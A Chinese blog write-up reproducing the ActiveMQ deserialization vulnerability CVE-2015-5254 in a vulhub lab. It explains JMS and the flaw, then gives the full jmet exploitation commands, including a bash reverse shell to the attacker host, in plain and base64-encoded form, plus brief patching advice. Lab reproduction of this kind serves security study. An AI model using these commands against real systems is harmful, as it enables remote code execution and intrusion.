ActiveMQ 反序列化漏洞复现(CVE-2015-5254)

最新推荐文章于 2024-02-26 13:55:20 发布
最新推荐文章于 2024-02-26 13:55:20 发布
阅读量493 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: java-activemq activemq java 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/130127860
版权

0x00 漏洞简介:

         Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。

0x01 原理分析:

         Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

0x02 ​漏洞适用版本:

Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

 0x03 JMS简介:

​         JavaEE中定义的“Java消息服务”(JMS),定义了Java中访问消息中间件的接口。JMS只 是一套接口,并没有给予实现,各大厂商和开源组织都对JMS实现不同产品,这些产品 包括:Apache的ActiveMQ、阿里的RocketMQ、IBM的MQSeries、Microsoft的MSMQ和 Spring Source的RabbitMQ等等,它们基本都遵循JMS规范。

JMS消息由以下三部分组成的:

  • 消息头:​ 每个消息头字段都有相应的getter和setter方法。
  • 消息属性:如果需要除消息头字段以外的值,那么可以使用消息属性。
  • 消息体:JMS定义的消息类型有TextMessage、MapMessage、BytesMessage、StreamMessage和ObjectMessage。

详细的消息类型介绍如下:

属性类型
TextMessage文本消息
MapMessagek/v
BytesMessage字节流
StreamMessagejava原始的数据流
ObjectMessage序列化的java对象

0x04 漏洞复现:

环境准备

服务器:Centos 7 (IP:192.168.217.140)

ActiveMQ 版本:5.11.1

攻击机:kali(IP:192.168.217.141)

利用工具: https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  • 进到vulhub靶场进行搭建靶场
docker-compose up -d

  • 然后访问靶机的8186端口,看看是否部署成功

  • 可以看到主页,然后点击Manage ActiveMQ broker 进入到登录界面,用户名和密码都是admin

  • 在Queues里边可以看到现在在队列里边的任务,但是现在里面是空的

  • 接下来在kali里边直接使用jmet-0.1.0-all.jar 创建目录进行验证
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "touch /tmp/Angustest" -Yp ROME 192.168.217.140 61616

  • 此时返回网站查看,可以看到队列里出现了一个event新的任务

  • 点进event

  • 点进去任务详情触发

  • 接下来进入docker检验漏洞是否存在,看看是否/tmp下面有我们写入的文件
docker exec -it 25a18ee3883d /bin/bash

 

  • 发现文件被成功写入,确认漏洞之后就可以进行getshell,更换一下命令即可

payload:

echo "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1" > /tmp/shell.sh && bash /tmp/shell.sh
  • 因为直接反弹shell不行所以尝试写命令到shell.sh中然后执行
bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNDQ0NCAwPiYxIiA+IC90bXAvc2hlbGwuc2ggJiYgYmFzaCAvdG1wL3NoZWxsLnNo}|{base64,-d}|{bash,-i}
  • 然后使用 jmet-0.1.0-all.jar 进行漏洞利用
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNDQ0NCAwPiYxIiA+IC90bXAvc2hlbGwuc2ggJiYgYmFzaCAvdG1wL3NoZWxsLnNo}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.217.140 61616

  • 同时kali监听端口,并点击任务详情

  • kali上能看到成功返回的shell

 0x05 修复建议:

  • 升级到最新的版本或者使用官网的修复补丁进行修复。

  • 有条件的可以配置waf规则使用waf进行防护。

 

kukuromi
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RabbitMQ真实生产故障问题还原与分析
Java技术攻略的博客
04-20 871
就相当于死循环了,所以容易导致消费端资源占用过高,特别是TCP连接数、线程数、IO飙升,如果个别程序带事务或数据库操作等连接资源得不到释放也会占满,导致应用假死状态(出现问题的时候,查看问题应用出现大量的connection timeout错误报错日志)。那么问题来了,这是为什么呢?: 服务端调用Basic.Deliver方法,和第一次Basic.Deliver方法不同的是,此时的redeliver参数为true,表示重新投递消息到监听队列的消费者,然后这两步会一直重复下去。
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞反序列化漏洞CVE-2015-5254,利用工具,工具
CVE-2015-5254
forinput的博客
03-01 59
CVE-2015-5254
RabbitMQ开启TLS支持,解决AMQP明文身份验证漏洞
最新发布
创意程序员的博客
02-26 1727
随着网络通信安全性的日益重要,我们不难发现,在企业级应用中,数据传输的安全防护措施已经成为不可或缺的一环。近期,不少使用RabbitMQ的开发团队收到了关于“远程主机允许明文身份验证”的漏洞警告。为确保敏感信息的安全传递,启用TLS(Transport Layer Security)支持成为了关键的解决方案。本文将详细介绍如何在RabbitMQ中启用TLS加密,以及在SpringBoot应用中配置TLS并设置EXTERNAL认证,通过实际操作步骤解决明文身份验证漏洞
ActiveMQ反序列化漏洞CVE-2015-5254复现
菲曼巴的博客
11-24 3464
ActiveMQ反序列化漏洞CVE-2015-5254复现详细过程 访问ip:8161/admin 默认密码:admin/admin wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar kali下载工具并使用 mkdir external 创建文件夹否则会报错提示不存在文件夹 bash -i >& /dev/tcp/192.168.186.129/8888 0>
jmeter.jar启动中出现的报错以及解决方案
qq_40328109的博客
12-10 529
在命令行界面首部出现下面提示: WARNING:Could not open/create prefs root node Software\JavaSoft\Prefs at root 0x80000002 原因:权限不够。 解决方案:关闭该界面,重新以管理员身份运行。 ...
CVECVE-2015-5254ActiveMQ 反序列化漏洞利用
边扯边淡
03-15 1815
起序:复现不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞反序列化漏洞漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1788
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1469
ActiveMQ 反序列化漏洞
activemq系列漏洞复现
m0_49420271的博客
06-07 2722
vulhub中activemq系列漏洞复现
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5-src.zip
06-10
activemq-cpp-library-3.9.5-src.zip
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
漏洞修复】docker 环境下,AMQP Cleartext认证漏洞,rabbitmq明文漏洞修复,超详细
yyysilence的博客
07-04 2653
sh create_client_cert.sh rabbitmq-client 654321 #654321为自定义密码。# -alias后为别称,-file后是服务端公钥位置,-keystore后是输出JSK证书位置 STORE_PASS任意。sh make_server_cert.sh rabbitmq-server 123456 #123456为自定义密码。部署完成后,docker exec进入容器,在容器中添加插件才能启用SSL验证的功能。3. server.key.pem # 服务器私钥。
ActiveMQ 反序列化漏洞CVE-2015-5254
The code way of kinnisoy
10-24 1952
ActiveMQ 反序列化漏洞CVE-2015-5254
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7731
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ 反序列化漏洞CVE-2015-5254漏洞复现
chenming08的博客
04-26 520
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)实验环境:攻击机----kali。3、启动环境(靶机)
常用的30+种未授权访问漏洞汇总
qq_50854662的博客
09-17 4933
常用的30+种未授权访问漏洞汇总
activemq Eclipse Jetty 安全漏洞(CVE-2022-2048)
06-03
关于activemq和Eclipse Jetty的安全漏洞CVE-2022-2048,这是一个已经公开的安全漏洞,存在于Activemq和Eclipse Jetty的HTTP2协议实现中。攻击者可以利用此漏洞在目标服务器上执行任意代码或造成拒绝服务攻击。 如果您正在使用Activemq或Eclipse Jetty,请及时更新软件版本以修复此漏洞。同时,建议您加强服务器安全设置,限制对服务器的访问和提高系统日志监控能力,以保障系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值